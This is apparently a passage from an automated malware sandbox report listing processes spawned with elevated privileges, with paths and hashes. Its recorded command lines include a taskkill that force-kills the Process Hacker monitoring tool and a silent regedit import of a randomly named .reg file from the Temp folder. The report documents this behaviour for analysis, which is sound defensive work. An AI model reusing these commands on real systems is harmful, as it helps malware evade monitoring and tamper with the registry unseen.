                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 4740 Parent PID: 6848

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:23
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 4524 Parent PID: 4596

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:28
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 4272 Parent PID: 4524

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:28
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 6376 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:37
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 4568 Parent PID: 6376

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:38
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: taskkill.exe PID: 6664 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:39
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:taskkill /IM ProcessHacker.exe /T /F
                                                                                                                                                                                              Imagebase:0xbb0000
                                                                                                                                                                                              File size:74752 bytes
                                                                                                                                                                                              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Analysis Process: cmd.exe PID: 2032 Parent PID: 1540

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:39
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >